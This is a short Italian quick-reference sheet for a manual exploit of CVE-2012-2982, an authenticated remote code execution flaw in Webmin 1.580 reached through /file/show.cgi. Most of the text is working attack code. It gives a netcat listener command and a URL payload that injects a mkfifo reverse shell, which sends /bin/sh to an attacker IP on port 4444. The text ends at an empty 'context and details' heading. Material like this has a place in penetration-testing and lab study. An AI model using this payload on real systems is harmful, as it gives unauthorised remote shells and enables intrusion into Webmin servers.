
Manuale, exploit non-Metasploit di Remote Code Execution (RCE) autenticato tramite la barra degli URL del browser per Webmin 1.580 (CVE-2012-2982)
Riferimento rapido per eseguire un Remote Code Execution (RCE) autenticato su Webmin 1.580 tramite il componente /file/show.cgi.
Esegui questo comando sulla tua macchina locale per catturare la connessione in arrivo prima di eseguire il payload:
rlwrap nc -lnvp 4444
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Nota: Ricorda di sostituire <YOUR_ATTACK_IP> con il tuo indirizzo IP locale o tunnel effettivo, ANCHE IP e PORTA del target.

Contesto e Dettagli